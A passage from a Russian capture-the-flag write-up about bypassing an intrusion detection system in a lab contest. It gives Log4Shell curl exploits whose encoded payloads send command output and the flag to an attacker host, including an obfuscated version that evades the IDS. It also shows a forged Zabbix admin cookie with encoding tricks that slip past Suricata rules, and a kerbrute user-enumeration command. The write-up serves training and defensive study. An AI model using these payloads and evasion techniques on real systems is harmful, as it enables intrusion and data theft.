\u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u0431\u043e\u0442\u0430. \u042d\u0442\u043e\u0442 \u043f\u043e\u0434\u0445\u043e\u0434 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b \u0441\u0435\u0431\u044f \u043d\u0430 100%! <\/p>\n<p>\u0412\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0430 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f. \u041d\u0430 \u0441\u0442\u0435\u043d\u0434\u0435 \u0441\u0442\u043e\u044f\u043b\u043e \u0441\u0435\u043c\u044c \u042d\u041b\u0422-\u0442\u0435\u043b\u0435\u0432\u0438\u0437\u043e\u0440\u043e\u0432: \u043f\u043e \u0442\u0435\u043b\u0435\u0432\u0438\u0437\u043e\u0440\u0443 \u043d\u0430 \u043a\u0430\u0436\u0434\u043e\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0438 \u043e\u0434\u0438\u043d \u0434\u043b\u044f \u043e\u0431\u0449\u0435\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u041d\u0430 \u044d\u043a\u0440\u0430\u043d\u044b \u0432\u044b\u0432\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u0434\u0430\u0448\u0431\u043e\u0440\u0434, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0447\u0438\u0441\u043b\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 \u0438 \u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0437\u043b\u043e\u043c\u043e\u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432. <\/p>\n<p>\u0427\u0438\u0441\u043b\u043e \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u0431\u044b\u043b\u043e \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u044b\u043c. \u041e\u0442\u0447\u0430\u0441\u0442\u0438 \u044d\u0442\u043e\u043c\u0443 \u0441\u043f\u043e\u0441\u043e\u0431\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u043e \u0438 \u0442\u043e, \u0447\u0442\u043e IDS Bypass \u0431\u044b\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043b\u044e\u0431\u043e\u043c\u0443 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043e\u043d\u043b\u0430\u0439\u043d \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u043b\u0441\u044f \u043d\u043e\u0447\u044c\u044e: \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430 \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u0442\u0430\u0431\u043b\u043e \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u043e 101 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430, \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0440\u0435\u0448\u0438\u043b\u0438 \u0445\u043e\u0442\u044f \u0431\u044b \u043e\u0434\u043d\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435. \u0412 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 IDS Bypass \u0434\u043b\u0438\u043b\u0441\u044f \u043f\u043e\u0447\u0442\u0438 30 \u0447\u0430\u0441\u043e\u0432.<\/p>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u043a \u0440\u0430\u0437\u0431\u043e\u0440\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u0439.<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 1: Log4j (20 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><figcaption><\/figcaption><\/figure>\n<p>\u0421\u0442\u043e\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 20 \u043e\u0447\u043a\u043e\u0432, \u043d\u043e \u0443\u043c\u0435\u043d\u044c\u0448\u0430\u043b\u0430\u0441\u044c \u043d\u0430 \u043e\u0434\u043d\u043e \u043e\u0447\u043a\u043e \u0437\u0430 \u043a\u0430\u0436\u0434\u043e\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435. \u0418\u0437 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u044b\u043b\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 log4j. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f <a href=\"https:\/\/github.com\/christophetd\/log4shell-vulnerable-app\">\u0434\u043e\u043a\u0435\u0440-\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440<\/a>. \u0422\u0443\u0442 \u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442:<\/p>\n<pre><code>curl -v http:\/\/10.0.0.10:8080 -H 'X-Api-Version: ${jndi:ldap:\/\/10.8.0.18:1389\/Basic\/Command\/Base64\/d2dldCBodHRwOi8vMTAuOC4wLjE4OjQ0NDQgLS11c2VyLWFnZW50PSIkKHB3ZDsgbHMgLWxhOyBpZmNvbmZpZyki}'<\/code><\/pre>\n<p>\u0422\u0430\u043a\u0443\u044e \u0430\u0442\u0430\u043a\u0443 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442 IDS, \u0438 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u0432\u0438\u0434\u0438\u0442, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435:<\/p>\n<p><code>ATTACK [PTsecurity] log4j RCE aka Log4Shell TCP attempt (CVE-2021-44228)<\/code><\/p>\n<p>\u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u0435\u0441\u044f\u0446\u0435\u0432 \u043d\u0430\u0437\u0430\u0434, \u0432\u0441\u043a\u043e\u0440\u0435 \u043f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0434\u043b\u044f Log4Shell, \u0441\u0442\u0430\u043b\u0438 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0435\u0433\u043e \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 WAF \u0438 IDS. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, <a href=\"https:\/\/github.com\/34zY\/JNDI-Exploit-1.2-log4shell\">\u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u043d\u0430 GitHub<\/a> \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d \u0442\u043e\u0442 \u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043d\u043e \u0441 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0435\u0439 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439. \u0418\u0442\u043e\u0433\u043e\u0432\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 IDS, \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u0438\u043c:<\/p>\n<pre><code>curl -v http:\/\/10.0.0.10:8080 -H 'X-Api-Version: ${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:\/}\/10.8.0.26:1389\/Basic\/Command\/Base64\/d2dldCBodHRwOi8vMTAuOC4wLjI2OjQ0NDQgLS11c2VyLWFnZW50PSIkKGxzIC1sYSAvOyBjYXQgL2ZsYWcpIg==}'<\/code><\/pre>\n<p>\u041e\u0442\u0434\u0430\u0432 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0438 \u043f\u0440\u0438\u043d\u044f\u0432 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043a \u043f\u043e\u0440\u0442\u0443 4444, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u043b\u0430\u0433: flag{L0g_FOR_Wh4t?}<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 2: Zabbix (20 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><figcaption><\/figcaption><\/figure>\n<p>\u041e\u0434\u043d\u0430 \u0438\u0437 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 Zabbix \u2014 <a href=\"https:\/\/blog.sonarsource.com\/zabbix-case-study-of-unsafe-session-storage\/\">CVE-2022-23131<\/a>. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 SSO \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c \u043a\u0443\u043a\u0438 \u0438 \u0432\u043e\u0439\u0442\u0438 \u0432 Zabbix \u0431\u0435\u0437 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0441 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430. \u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 <a href=\"https:\/\/github.com\/Mr-xn\/cve-2022-23131\">\u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d \u043d\u0430 GitHub<\/a>, \u0438 \u043e\u043d \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0442\u0440\u0435\u0445 IDS-\u043f\u0440\u0430\u0432\u0438\u043b:<\/p>\n<ul>\n<li>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M1<\/code><\/p>\n<\/li>\n<li>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M2<\/code><\/p>\n<\/li>\n<li>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M3<\/code><\/p>\n<\/li>\n<\/ul>\n<p>\u042d\u0442\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044b \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f. \u0420\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u043e\u043d\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 <a href=\"https:\/\/rules.emergingthreats.net\/open\/suricata-5.0\/emerging-all.rules\">ET Open Ruleset<\/a>. \u0412\u043e\u0442, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0430\u043a \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u0435\u0440\u0432\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e:<\/p>\n<pre><code>alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M1\"; flow:established,to_server; http.uri; content:\"\/index_sso.php\"; startswith; http.cookie; content:\"zbx_session=\"; content:\"InVzZXJuYW1lX2F0dHJpYnV0ZSI6\"; distance:0; fast_pattern; pcre:\"\/(?:InNhbWxfZGF0YS|JzYW1sX2RhdGEi|ic2FtbF9kYXRhI)\/\"; reference:url,blog.sonarsource.com\/zabbix-case-study-of-unsafe-session-storage; reference:cve,2022-23131; classtype:trojan-activity; sid:2035371; rev:2; metadata:attack_target Server, created_at 2022_03_02, cve CVE_2022_23131, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2022_03_02;)<\/code><\/pre>\n<p>\u041c\u043d\u043e\u0433\u0438\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c <a href=\"https:\/\/github.com\/Mr-xn\/cve-2022-23131\/blob\/main\/zabbix_session_exp.py\">\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c<\/a>. \u0415\u0441\u043b\u0438 \u0440\u0430\u0441\u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u043d\u0435\u043c \u0441\u0442\u0440\u043e\u043a\u0443 62, \u0442\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0432\u044b\u0432\u043e\u0434\u0438\u043b \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u0443\u043a\u0438 zbx_session, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0437\u0430\u0434\u0430\u0442\u044c \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435:<\/p>\n<pre><code>Cookie: zbx_session= eyJzYW1sX2RhdGEiOiB7InVzZXJuYW1lX2F0dHJpYnV0ZSI6ICJBZG1pbiJ9LCAic2Vzc2lvbmlkIjogImZkYmQ2Y2JiYmIyMTEzM2RmNDM3NmU0YzRhZjc0OTIwIiwgInNpZ24iOiAiRENoZHZWUHBubEZBMEpqVFVDV2lHWkZaZWZ6OU1MMnlxTlpubzVPUkRQeDJDaGhiN0hOVWV1VjRPN2QwYWY5T2d5b09ONjhPYmdOWkgzMGhnV1c3NlE9PSJ9<\/code><\/pre>\n<p>\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u043b \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u043f\u0430\u043d\u0435\u043b\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 Zabbix. \u041d\u043e \u043f\u0440\u043e\u0434\u0435\u043b\u0430\u0432 \u044d\u0442\u043e\u0442 \u043f\u0443\u0442\u044c, \u043e\u043d \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435 \u043e\u0442 IDS:<\/p>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M1<\/code><\/p>\n<p>\u0427\u0442\u043e\u0431\u044b \u043e\u0431\u043e\u0439\u0442\u0438 IDS, \u043c\u043d\u043e\u0433\u0438\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u0443\u043a\u0438 zbx_session \u0432 URL encoding:<\/p>\n<pre><code>Cookie: zbx_session= %65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%69%42%37%49%6e%56%7a%5a%58%4a%75%59%57%31%6c%58%32%46%30%64%48%4a%70%59%6e%56%30%5a%53%49%36%49%43%4a%42%5a%47%31%70%62%69%4a%39%4c%43%41%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%67%49%6d%5a%6b%59%6d%51%32%59%32%4a%69%59%6d%49%79%4d%54%45%7a%4d%32%52%6d%4e%44%4d%33%4e%6d%55%30%59%7a%52%68%5a%6a%63%30%4f%54%49%77%49%69%77%67%49%6e%4e%70%5a%32%34%69%4f%69%41%69%52%45%4e%6f%5a%48%5a%57%55%48%42%75%62%45%5a%42%4d%45%70%71%56%46%56%44%56%32%6c%48%57%6b%5a%61%5a%57%5a%36%4f%55%31%4d%4d%6e%6c%78%54%6c%70%75%62%7a%56%50%55%6b%52%51%65%44%4a%44%61%47%68%69%4e%30%68%4f%56%57%56%31%56%6a%52%50%4e%32%51%77%59%57%59%35%54%32%64%35%62%30%39%4f%4e%6a%68%50%59%6d%64%4f%57%6b%67%7a%4d%47%68%6e%56%31%63%33%4e%6c%45%39%50%53%4a%39<\/code><\/pre>\n<p>\u042d\u0442\u043e \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u044b\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0430 IDS Bypass \u043c\u043e\u0433\u0443\u0442 \u0438\u043c\u0435\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u0439. \u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0434\u0443\u043c\u044b\u0432\u0430\u043b\u0441\u044f \u043e\u0431\u0445\u043e\u0434 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u0430. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0441\u043b\u0435 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0442\u0430\u043a\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043a\u0443\u043a\u0438 zbx_session:<\/p>\n<p><code>{\"saml_data\": {\"username_attribute\": \"Admin\"}, \"sessionid\": \"fdbd6cbbbb21133df4376e4c4af74920\", \"sign\": \"DChdvVPpnlFA0JjTUCWiGZFZefz9ML2yqNZno5ORDPx2Chhb7HNUeuV4O7d0af9OgyoON68ObgNZH30hgWW76Q==\"}<\/code><\/p>\n<p>\u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442\u044b base64 \u0438\u0437 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 IDS \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:<\/p>\n<ul>\n<li>\n<p><code>\"username_attribute\":<\/code><\/p>\n<\/li>\n<li>\n<p><code>\"saml_data<\/code><\/p>\n<\/li>\n<\/ul>\n<p>\u041f\u043e\u0441\u0442\u0430\u0432\u0438\u0432 \u043f\u0440\u043e\u0431\u0435\u043b \u043f\u0435\u0440\u0435\u0434 \u0434\u0432\u043e\u0435\u0442\u043e\u0447\u0438\u0435\u043c \u0432 \u043a\u043b\u044e\u0447\u0435 username_attribute, \u043c\u044b \u043d\u0435 \u043d\u0430\u0440\u0443\u0448\u0438\u043c \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 json, \u043d\u043e \u043e\u0431\u043e\u0439\u0434\u0435\u043c IDS-\u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0432\u044b\u0448\u0435. \u042d\u0442\u043e \u0442\u043e\u0436\u0435 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044e \u0444\u043b\u0430\u0433\u0430 (\u043f\u043e\u043b\u044f sessionid \u0438 sign \u043d\u0435\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u044b):<\/p>\n<p><code>Cookie: zbx_session= eyJzYW1sX2RhdGEiIDp7InVzZXJuYW1lX2F0dHJpYnV0ZSIgOiJBZG1pbiJ9LCAic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9<\/code> <\/p>\n<p>\u0424\u043b\u0430\u0433 \u0441\u043a\u0440\u044b\u0432\u0430\u043b\u0441\u044f \u0432 \u0441\u043f\u0438\u0441\u043a\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Zabbix.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 3: EVIL.CORP (30 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><figcaption><\/figcaption><\/figure>\n<p>\u0412 \u0442\u0435\u043a\u0441\u0442\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0433\u043e\u0432\u043e\u0440\u0438\u043b\u043e\u0441\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0435\u0440\u0435\u0431\u0440\u0430\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 EVIL.CORP \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 Kerberos. \u0418\u043c\u0435\u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u043c\u0435\u044e\u0442 \u0441\u0442\u0440\u043e\u0433\u043e \u043e\u0433\u043e\u0432\u043e\u0440\u0435\u043d\u043d\u044b\u0439 \u0444\u043e\u0440\u043c\u0430\u0442: user[1..16]_[a..z0..9]. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0439\u0442\u0438 \u043d\u0435 \u0442\u0430\u043a? \u041e\u0434\u043d\u0430\u043a\u043e \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u043a\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0437\u0430\u0449\u0438\u0442\u044b, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0430 ML\u2026<\/p>\n<p>\u0414\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e\u0434\u043e\u0439\u0434\u0435\u0442 \u043b\u044e\u0431\u043e\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, <a href=\"https:\/\/github.com\/ropnop\/kerbrute\">kerbrute<\/a>). \u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0431\u043e\u0440:<\/p>\n<p> <code>kerbrute -dc-ip 10.0.0.145 -domain evil.corp -threads 2 -users usernames.txt;<\/code><\/p>\n<p>\u041f\u043e\u0447\u0442\u0438 \u0441\u0440\u0430\u0437\u0443 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u044f \u043e\u0442 IDS (\u043f\u043e \u043e\u0434\u043d\u043e\u043c\u0443 \u043d\u0430 \u043a\u0430\u0436\u0434\u044b\u0439 \u0442\u0440\u0435\u0434). \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0442\u0440\u0435\u0434\u043e\u0432, \u0440\u0430\u0432\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u043e \u0443\u0441\u043f\u0435\u0445\u0430 \u044d\u0442\u043e, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u043d\u0435 \u043f\u0440\u0438\u043d\u0435\u0441\u043b\u043e:<\/p>\n<p><code>ANOMALY [PTsecurity] Your traffic looks like kerberos user enumeration (Too many usernames). Blocked for 300 seconds<\/code><\/p>\n<p>\u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u0430, \u043d\u043e \u0438 \u0431\u043b\u043e\u043a \u043d\u0430 \u043f\u044f\u0442\u044c \u043c\u0438\u043d\u0443\u0442. \u0415\u0441\u0442\u044c \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u0434\u0443\u043c\u0430\u0442\u044c.<\/p>\n<p>\u0410\u0431\u0431\u0440\u0435\u0432\u0438\u0430\u0442\u0443\u0440\u0430 ML \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0443\u0436\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u0448\u0435\u043d\u0438\u044f. \u0412\u043c\u0435\u0441\u0442\u043e ML \u2014 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 